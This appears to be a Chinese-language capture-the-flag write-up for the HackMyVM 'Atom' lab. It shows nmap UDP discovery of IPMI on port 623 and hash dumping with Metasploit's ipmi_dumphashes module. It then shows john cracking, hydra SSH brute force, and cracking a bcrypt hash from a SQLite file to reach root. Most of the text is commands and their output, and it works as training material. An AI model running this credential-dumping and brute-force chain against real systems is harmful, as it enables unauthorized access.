HackmyVm的靶机Atom,下载地址是https://hackmyvm.eu/machines/machine.php?vm=Atom
正常nmap扫描,只能找到22端口,非常蹊跷。卡在第一步就非常郁闷了,cromiphi制作的靶机总是有点小坑的!
└─$ nmap -sV -sC -Pn -oN port.log 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 20:20 CST
Nmap scan report for 192.168.56.118
Host is up (0.0026s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
|_ 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
这里必须用upd进行扫描。udp扫描的速度通常很慢,这里加上--version-intensity 0 -F -T4参数。
└─$ sudo nmap -sU -sV --version-intensity 0 -F -n -T4 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-22 20:24 CST
Nmap scan report for 192.168.56.118
Host is up (0.0013s latency).
Not shown: 60 open|filtered udp ports (no-response), 39 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
MAC Address: 08:00:27:E6:C5:CC (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.39 seconds又扫出来一个端口623。在网上搜索,这个asf-rmcp是有漏洞的,可以使用msfconsole进行利用。
└─$ msfconsole -q
msf6 > search ipmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal No IPMI 2.0 Cipher Zero Authentication Bypass Scanner
1 auxiliary/scanner/ipmi/ipmi_dumphashes 2013-06-20 normal No IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
2 auxiliary/scanner/ipmi/ipmi_version . normal No IPMI Information Discovery使用ipmi_dumphashes这个模块可以dump密码hash。但使用默认用户名密码时,可以直接得到admin的密码,但这个用户名和密码没有办法进行下一步工作。
[*] Using auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 192.168.56.118
rhosts => 192.168.56.118
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt yes File containing common passwords for offline cracking, one per line
RHOSTS 192.168.56.118 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt yes File containing usernames, one per line
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 192.168.56.118:623 - IPMI - Hash found: admin:c6aeec6f042100005a600631aefe49f73bcceaf2d6b63d5d1f747466c5e2878c73e7631cf17874a7a123456789abcdefa123456789abcdef140561646d696e:1655d46ba4eac636a41a2279e1f3b43faa88be91
[+] 192.168.56.118:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed将用户名字典设为seclists中的更大的用户名字典,再次运行,可以得到多个用户名的密码hash,我们导出为john可以爆破的文件。
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set user_file /usr/share/wordlists/seclists/Usernames/Names/names.txt
user_file => /usr/share/wordlists/seclists/Usernames/Names/names.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 192.168.56.118:623 - IPMI - Hash found: admin:9710a506024f00002e6b024cc9d1838b83a4de66665b1329dec62ca1fc02de473299a8f4c3973615a123456789abcdefa123456789abcdef140561646d696e:e473a0a2b2af52a0124de089d2738341fbae0e55
[+] 192.168.56.118:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[+] 192.168.56.118:623 - IPMI - Hash found: analiese:b4f761bf84ff000055c6cb90c405384cdc325bd8aa2b3231484d3b2439da3da797dc4fbff2f93d25a123456789abcdefa123456789abcdef1408616e616c69657365:48446921c861594211eeaed52dd758099ab314bd
...使用john来破解dump出的john_file。
└─$ cat john_file
192.168.56.118 admin:$rakp$c6aeec6f042100005a600631aefe49f73bcceaf2d6b63d5d1f747466c5e2878c73e7631cf17874a7a123456789abcdefa123456789abcdef140561646d696e$1655d46ba4eac636a41a2279e1f3b43faa88be91
192.168.56.118 admin:$rakp$9710a506024f00002e6b024cc9d1838b83a4de66665b1329dec62ca1fc02de473299a8f4c3973615a123456789abcdefa123456789abcdef140561646d696e$e473a0a2b2af52a0124de089d2738341fbae0e55
192.168.56.118 analiese:$rakp$b4f761bf84ff000055c6cb90c405384cdc325bd8aa2b3231484d3b2439da3da797dc4fbff2f93d25a123456789abcdefa123456789abcdef1408616e616c69657365$48446921c861594211eeaed52dd758099ab314bd
192.168.56.118 asia:$rakp$61ebf53f86a20100fb316f3f1b4ebfb343462afaac35a1e7ea81003e4493318f1e6ee5159b19fd18a123456789abcdefa123456789abcdef140461736961$4ad733b1f06afdc260d0834015660b9df0513d64
...
└─$ john john_file
Using default input encoding: UTF-8
Loaded 29 password hashes with 29 different salts (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 SSE2 4x])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
batman! (192.168.56.118 rozalia)
emeralds (192.168.56.118 karlotte)
phones (192.168.56.118 palmer)
Proceeding with incremental:ASCII
090506 (192.168.56.118 saman)
120691 (192.168.56.118 zaylen)
241107 (192.168.56.118 mayeul)
...分别将用户名和密码保存下来,然后对22端口的ssh进行爆破。
└─$ hydra -L user.txt -P pass.txt ssh://192.168.56.118
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-22 20:43:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 672 login tries (l:28/p:24), ~42 tries per task
[DATA] attacking ssh://192.168.56.118:22/
[STATUS] 264.00 tries/min, 264 tries in 00:01h, 410 to do in 00:02h用ssh登录后,开始提权。在/var/www/html下找到一个数据库文件,可以得到atom用户的密码hash。
onida@atom:/var/www/html$ sqlite3 atom-2400-database.db
SQLite version 3.40.1 2022-12-28 14:03:47
sqlite> .show
echo: off
eqp: off
explain: auto
headers: off
mode: list
nullvalue: ""
output: stdout
colseparator: "|"
rowseparator: "\n"
stats: off
width:
filename: atom-2400-database.db
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE login_attempts (
id INTEGER PRIMARY KEY,
ip_address TEXT NOT NULL,
attempt_time INTEGER NOT NULL
);
CREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
);
INSERT INTO users VALUES(1,'atom','$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm');
COMMIT;使用john进行爆破可以得到一个密码。
└─$ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
madison (?)
1g 0:00:00:01 DONE 2/3 (2024-07-22 20:50) 0.9615g/s 207.6p/s 207.6c/s 207.6C/s goodluck..stephen
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 使用这个密码可以得到root。
onida@atom:/var/www/html$ su
Password:
root@atom:/var/www/html#